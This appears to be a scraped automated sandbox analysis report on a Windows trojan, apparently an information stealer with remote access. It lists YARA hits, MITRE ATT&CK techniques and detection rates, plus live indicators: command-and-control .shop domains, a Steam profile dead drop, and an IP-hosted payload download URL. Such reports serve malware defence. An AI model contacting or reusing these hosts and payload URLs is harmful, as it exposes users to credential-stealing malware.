    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_004163DA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_004163DA
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
    Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_004218BC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218BC
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_00420BE6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420BE6
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_02161B23 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_02161B23
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_02160E4D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_02160E4D
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Native API
    1
    DLL Side-Loading
    11
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    System Time Discovery
    Remote Services1
    Screen Capture
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    1
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Query Registry
    Remote Desktop Protocol1
    Archive Collected Data
    12
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
    Process Injection
    Security Account Manager131
    Security Software Discovery
    SMB/Windows Admin Shares3
    Clipboard Data
    2
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
    Deobfuscate/Decode Files or Information
    NTDS1
    Virtualization/Sandbox Evasion
    Distributed Component Object ModelInput Capture123
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
    Obfuscated Files or Information
    LSA Secrets1
    Process Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
    Software Packing
    Cached Domain Credentials1
    Application Window Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading
    DCSync2
    File and Directory Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
    System Information Discovery
    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    lBb4XI4eGD.exe41%VirustotalBrowse
    lBb4XI4eGD.exe50%ReversingLabsWin32.Trojan.CrypterX
    lBb4XI4eGD.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\E6F4.tmp.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe50%ReversingLabsWin32.Trojan.CrypterX
    C:\Users\user\AppData\Local\Temp\E6F4.tmp.exe50%ReversingLabsWin32.Trojan.CrypterX
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://post-to-me.com/2U100%Avira URL Cloudmalware
    https://chipdonkeruz.shop/api100%Avira URL Cloudmalware
    http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE0%Avira URL Cloudsafe
    https://post-to-me.com/track_prt.php?sub=100%Avira URL Cloudmalware
    https://post-to-me.com/100%Avira URL Cloudmalware
    https://broadcast.st.dl.eccdnx.c0%Avira URL Cloudsafe
    http://176.113.115.19/ScreenUpdateSync.exe00%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    post-to-me.com
    172.67.179.207
    truefalse
      high
      steamcommunity.com
      104.102.49.254
      truefalse
        high
        femalsabler.shop
        unknown
        unknownfalse
          high
          robinsharez.shop
          unknown
          unknownfalse
            high
            soundtappysk.shop
            unknown
            unknownfalse
              high
              crowdwarek.shop
              unknown
              unknownfalse
                high
                versersleep.shop
                unknown
                unknownfalse
                  high
                  skidjazzyric.click
                  unknown
                  unknownfalse
                    high
                    chipdonkeruz.shop
                    unknown
                    unknownfalse
                      high
                      apporholis.shop
                      unknown
                      unknownfalse
                        high
                        handscreamny.shop
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          robinsharez.shopfalse
                            high
                            versersleep.shopfalse
                              high
                              crowdwarek.shopfalse
                                high
                                skidjazzyric.clickfalse
                                  high
                                  https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
                                    high
                                    femalsabler.shopfalse
                                      high
                                      https://steamcommunity.com/profiles/76561199724331900false
                                        high
                                        soundtappysk.shopfalse
                                          high
                                          apporholis.shopfalse
                                            high
                                            handscreamny.shopfalse
                                              high
                                              chipdonkeruz.shopfalse
                                                high
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://steamcommunity.com/my/wishlist/E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651328116.00000000006EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngE6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://player.vimeo.comE6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://post-to-me.com/2UlBb4XI4eGD.exe, 00000000.00000002.3954535854.0000000000800000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://steamcommunity.com/?subsection=broadcastsE6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://help.steampowered.com/en/E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://steamcommunity.com/market/E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://store.steampowered.com/news/E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://store.steampowered.com/subscriber_agreement/E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.gstatic.cn/recaptcha/E6F4.tmp.exe, 00000003.00000002.1651189199.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://store.steampowered.com/subscriber_agreement/E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000687000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgE6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651114679.0000000000678000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588600315.0000000000678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://recaptcha.net/recaptcha/;E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=enE6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://176.113.115.19/ScreenUpdateSync.exelBb4XI4eGD.exe, 00000000.00000002.3954535854.0000000000800000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.valvesoftware.com/legal.htmE6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://steamcommunity.com/discussions/E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.youtube.comE6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.google.comE6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://store.steampowered.com/stats/E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARElBb4XI4eGD.exe, 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amE6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651328116.00000000006EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://store.steampowered.com/points/shopbbE6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651328116.00000000006EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://medal.tvE6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://broadcast.st.dl.eccdnx.comE6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngE6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aE6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://store.steampowered.com/steam_refunds/E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackE6F4.tmp.exe, 00000003.00000003.1588256646.0000000000687000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651328116.00000000006EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651114679.0000000000678000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588600315.0000000000678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/E6F4.tmp.exe, 00000003.00000002.1651189199.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englE6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCE6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://s.ytimg.com;E6F4.tmp.exe, 00000003.00000002.1651189199.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://steamcommunity.com/workshop/E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://login.steampowered.com/E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbbE6F4.tmp.exe, 00000003.00000003.1588814170.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_cE6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651114679.0000000000678000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588600315.0000000000678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://store.steampowered.com/legal/E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000687000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lviEE6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651114679.0000000000678000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588600315.0000000000678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://community.fastly.steamstatic.com/E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=engliE6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://steam.tv/E6F4.tmp.exe, 00000003.00000002.1651189199.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enE6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651328116.00000000006EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://broadcast.st.dl.eccdnx.cE6F4.tmp.exe, 00000003.00000002.1651189199.0000000000691000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://chipdonkeruz.shop/apiE6F4.tmp.exe, 00000003.00000002.1651114679.0000000000678000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588600315.0000000000678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                              unknown
                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=engE6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://post-to-me.com/track_prt.php?sub=&cc=DElBb4XI4eGD.exe, 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://176.113.115.19/ScreenUpdateSync.exe0lBb4XI4eGD.exe, 00000000.00000003.1549198140.0000000000846000.00000004.00000020.00020000.00000000.sdmp, lBb4XI4eGD.exe, 00000000.00000002.3954535854.0000000000846000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://store.steampowered.com/privacy_agreement/E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651114679.0000000000678000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588600315.0000000000678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://store.steampowered.com/points/shop/E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://recaptcha.netE6F4.tmp.exe, 00000003.00000002.1651189199.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://upx.sf.netAmcache.hve.6.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://store.steampowered.com/E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://steamcommunity.comE6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651114679.0000000000678000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588600315.0000000000678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://sketchfab.comE6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://lv.queniujq.cnE6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pngE6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.youtube.com/E6F4.tmp.exe, 00000003.00000002.1651189199.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://127.0.0.1:27060E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
